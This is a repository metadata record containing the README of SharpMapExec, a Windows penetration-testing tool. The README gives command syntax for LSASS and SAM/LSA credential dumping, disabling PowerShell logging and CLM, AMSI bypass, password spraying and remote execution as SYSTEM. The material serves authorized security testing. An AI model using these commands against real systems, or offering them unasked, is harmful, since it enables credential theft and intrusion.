{"id":13840625,"url":"https://github.com/cube0x0/SharpMapExec","last_synced_at":"2025-07-11T09:32:40.772Z","repository":{"id":39304735,"uuid":"317543210","full_name":"cube0x0/SharpMapExec","owner":"cube0x0","description":null,"archived":false,"fork":false,"pushed_at":"2021-11-17T17:53:12.000Z","size":13215,"stargazers_count":645,"open_issues_count":1,"forks_count":122,"subscribers_count":22,"default_branch":"main","last_synced_at":"2024-08-05T17:25:24.925Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cube0x0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-12-01T13:03:50.000Z","updated_at":"2024-07-26T14:28:12.000Z","dependencies_parsed_at":"2022-07-20T02:21:02.532Z","dependency_job_id":null,"html_url":"https://github.com/cube0x0/SharpMapExec","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cube0x0%2FSharpMapExec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cube0x0%2FSharpMapExec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cube0x0%2FSharpMapExec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cube0x0%2FSharpMapExec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cube0x0","download_url":"https://codeload.github.com/cube0x0/SharpMapExec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712576,"owners_count":17512427,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:51.074Z","updated_at":"2024-11-21T10:30:31.924Z","avatar_url":"https://github.com/cube0x0.png","language":"C#","readme":"# SharpMapExec\n\nA sharpen version of [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec). This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.\n\n\n\nBesides scanning for access it can be used to identify vulnerable configurations and exfiltrate data. The idea for the data exfiltration modules is to execute the least amount of necessary code on the remote computer. To accomplish this, the tool will download all the secrets to the loot directory and parse them locally.\n\n\n\nYou can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use [Rubeus](https://github.com/GhostPack/Rubeus) to import/ask for the ticket. If NTLM is specified, the tool will use [SharpKatz](https://github.com/b4rtik/SharpKatz) `SetThreadToken` or `LogonUser` impersonation.\n\n```\nSharpMapExec.exe\n usage:\n\n --- Cim ---\n Need plaintext password or the /impersonate flag\n SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET\n\n Available Cim modules\n /m:enable_winrm (Runs Enable-PSRemoting -Force)\n /m:disable_winrm (Runs Disable-PSRemoting -Force)\n /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)\n /m:disable_pslogging (Modify registry to disable PowerShell Logging)\n /m:check_pslockdown (Check __PSLockdownPolicy registry)\n /m:check_pslogging (Check PowerShell Logging registry)\n\n --- Reg32 ---\n SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET\n SharpMapExec.exe kerberos reg32 \u003c/user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi\u003e /computername:TARGET\n\n Reg32 modules\n /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)\n /m:check_pslockdown (Check __PSLockdownPolicy registry)\n /m:check_pslogging (Check PowerShell Logging registry)\n\n --- Smb ---\n SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET\n SharpMapExec.exe kerberos smb \u003c/user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi\u003e /computername:TARGET\n\n Smb modules\n /m:shares (Scan for accessible Smb shares)\n\n --- WinRm ---\n SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET\n SharpMapExec.exe kerberos winrm \u003c/user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi\u003e /computername:TARGET\n\n WinRm modules\n /m:exec /a:whoami (Invoke-Command)\n /m:exec /a:C:\\beacon.exe /system (Invoke-Command as System)\n /m:comsvcs (Dump \u0026 parse lsass)\n /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)\n /m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)\n /m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)\n /m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)\n /m:download /path:C:\\file /destination:file (Download file from host)\n /m:upload /path:C:\\file /destination:file (Upload file to host)\n\n --- Domain ---\n SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC\n SharpMapExec.exe tgtdeleg\n\n --- Ldap ---\n SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE\n SharpMapExec.exe kerberos ldap \u003c/user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi\u003e\n\n Ldap modules\n /m:spraydata (Download user and password policy)\n```\n\n### Smb\n\nCan be used to scan for admin access, accessible Smb shares, Smb version and relay signing.\n\n````\n/m:shares (Scan enumerated shares for access)\n````\n\n### WinRm\n\nThe beast. It has built-in Amsi bypass, JEA language breakout, JEA function analysis. Can be used for code execution, scaning for PsRemote access, vulnerable JEA endpoints, and data exfiltration.\n\n````\n/m:exec /a:whoami (Invoke-Command)\n/m:exec /a:C:\\beacon.exe /system (Invoke-Command as System)\n/m:comsvcs (Dump Lsass Process)\n/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)\n/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)\n/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)\n/m:download /path:C:\\file /destination:file (Download File from Host)\n````\n\n### Domain\n\nCurrently supports domain password spraying and to create a TGT for the current user that can be used with the `/ticket` parameter to get the current context.\n\n### Ldap\n\nDownload necessary data before pw spraying\n\n```\n/m:spraydata (Download user and password policy)\n```\n\n\n\n### Example usage\n\nFor easy or mass in-memory execution of C# assemblies\n\n![](images/mass_assembly.png)\n\nKerberos password spraying then scanning for local admin access\n\n![](images/spray+admin.png)\n\nThis project supports scanning JEA endpoints and will analyze source code of non default commands and check if the endpoint was not configured for `no-language` mode.\n\n![](images/jea.png)\n\nDiscover local admin password reuse with an NT hash.\n\n![](images/localadmin.png)\n\nMass dump Lsass process with built-in Microsoft signed DLL and saves it to the `loot` folder\n\n![](images/lsassdump.png)\n\nExecutes in all delegation processes sorted by unique by users\n\n![](images/delegwalk.png)\n\nScan for SMB signing and SMBv1\n\n![](images/smbvscan.png)\n\nAnd much more!\n\nSome scenarios with Kerberos will require you to sync your clock with the DC and set the DNS\n\n```powershell\nnet time \\\\DC01.hackit.local /set\nGet-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')\n```\n\n\n\n\n\n### Acknowledgments\n\nProjects that helped or are existing in this tool\n\n* [Rubeus](https://github.com/GhostPack/Rubeus) [@Harmj0y](https://twitter.com/harmj0y)\n* [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) [@Harmj0y](https://twitter.com/harmj0y)\n* [SharpKatz](https://github.com/b4rtik/SharpKatz) [@b4rtik](https://twitter.com/b4rtik)\n* [Amsi.Fail](https://github.com/Flangvik/AMSI.fail) [@Flangvik](https://twitter.com/Flangvik)\n* [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) [@G0ldenGunSec](https://twitter.com/G0ldenGunSec)\n* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)\n* [Pingcastle ](https://github.com/vletoux/pingcastle) [@mysmartlogon](https://twitter.com/mysmartlogon)\n* [SharpSpray](https://github.com/jnqpblc/SharpSpray)\n\n","funding_links":[],"categories":["C# (212)","C# #","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcube0x0%2FSharpMapExec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcube0x0%2FSharpMapExec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcube0x0%2FSharpMapExec/lists"}